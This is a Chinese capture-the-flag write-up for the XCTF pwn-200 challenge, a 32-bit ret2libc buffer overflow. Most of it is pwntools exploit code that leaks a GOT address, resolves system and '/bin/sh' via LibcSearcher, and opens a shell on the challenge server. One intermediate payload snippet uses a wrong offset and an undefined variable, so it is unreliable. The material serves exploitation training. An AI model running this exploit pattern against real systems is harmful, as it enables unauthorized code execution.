攻防世界 pwn-200

32位 ret2libc

题目下载连接

checksec

在这里插入图片描述
查看防护,无PIE与CANARY

IDA

main函数
在这里插入图片描述
sub_8048484()函数
在这里插入图片描述

分析

可以明显看到sub_8048484()函数当中存在溢出漏洞,程序又没有canary保护,那就比较简单
利用溢出泄露got表

elf=ELF('./ctf')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr = 0x080484BE
p.recvuntil('Welcome to XDCTF2015~!\n')
payload=b'a'*0x6c+b'a'*4+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(8)
p.sendline(payload)

然后就可以接收got表了

write_addr=u32(p.recv(4))

再利用LibcSearcher找到system与/bin/sh地址

from LibcSearcher import *
libc = LibcSearcher("write",write_addr)
libc_base=write_addr-libc.dump('write')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')

返回主函数后,再次利用漏洞即可

payload=b'a'*0x8c+b'a'*0x4+p32(system)+b'a'*a+p32(bin_sh)
p.sendline(payload)
p.interactive()

exp

from pwn import *
from LibcSearcher import *
p = remote("61.147.171.105",54546)
elf=ELF('./ctf')


write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr = 0x080484BE
p.recvuntil("Welcome to XDCTF2015~!\n")
payload=b'a'*0x6c+b'a'*4+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(8)
p.sendline(payload)
write_addr = u32(p.recv(4))
libc = LibcSearcher('write',write_addr)  
libc_base = write_addr - libc.dump('write')  
system_addr = libc_base + libc.dump('system')  
bin_sh = libc_base + libc.dump('str_bin_sh')

payload=b'a'*0x6c+b'a'*0x4+p32(system_addr)+p32(main_addr)+p32(bin_sh)
p.recvuntil("Welcome to XDCTF2015~!\n")
p.sendline(payload)
p.interactive()

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值